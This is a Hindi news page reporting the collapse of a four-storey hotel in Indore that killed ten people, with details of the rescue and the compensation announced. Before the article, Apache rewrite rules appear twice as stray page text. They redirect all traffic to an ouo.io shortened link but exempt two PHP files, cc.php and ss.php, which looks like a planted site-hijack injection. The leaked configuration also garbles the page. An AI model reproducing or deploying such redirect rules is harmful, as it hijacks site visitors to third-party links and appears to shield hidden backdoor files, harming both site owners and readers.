
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 1306
इंदौर। इंदौर में कल देर रात चार मंजिला होटल की इमारत पलभर में धराशायी हो गई। इस हादसे में मैनेजर सहित 10 लोगों की मौत हो गई। वहीं 6 घायल हो गए। अभी भी कई लोगों के मलबे में दबे होने की आशंका है। एमएस नाम का ये होटल सरवटे बस स्टैंड के पास स्थित था। बताया जा रहा है कि पूरी इमारत सिर्फ 20 सेकंड में ही धराशायी हो गई। बिल्डिंग के नीचे खड़ा ऑटो रिक्शा और कार भी चकनाचूर हो गए। हादसे के बाद देर रात तक रेस्क्यू टीम मलबा हटाती रही। वहीं सूचना पाकर पुलिस प्रशासन के साथ शहर के लाेग पहुंच गए थे और बचाव कार्य में मदद करते रहे। मुख्यमंत्री शिवराज सिंह चौहान ने मारे गए लोगों के परिजनों को 2 लाख और घायलों को 50 हजार रुपए के मुआवजे का एलान किया है।
- बिल्डिंग गिरने के बाद पांच मिनट तक पूरे इलाके में धूल-मिट्टी का गुबार फैल गया। इलाके में अफरा-तफरी मच गई। लोग जान बचाने के लिए गलियों में भागे, वहीं घायल मदद के लिए पुकार रहे थे।
- बिल्डिंग के आसपास खड़े लोगों को करीब 5-10 मिनट समझ ही नहीं आया कि अचानक यह क्या हो गया। मामला समझते ही लोग अपनी दुकानें, होटल और रेस्त्रां को बंदकर मदद में जुट गए।
- अंधेरा होने की वजह से लोगों ने मोबाइल की टाॅर्च जलाकर घायलों को निकालने में मदद की। घटना के आधे घंटे बाद जेसीबी आई, तब मलबा हटाना शुरू किया गया।
- भीड़ के कारण पुलिस व राहत कार्य में जुटे लोगों को दिक्कतों का सामना करना पड़ा। इन्हें खदेड़ने के लिए पुलिस को लाठियां भी भांजना पड़ीं।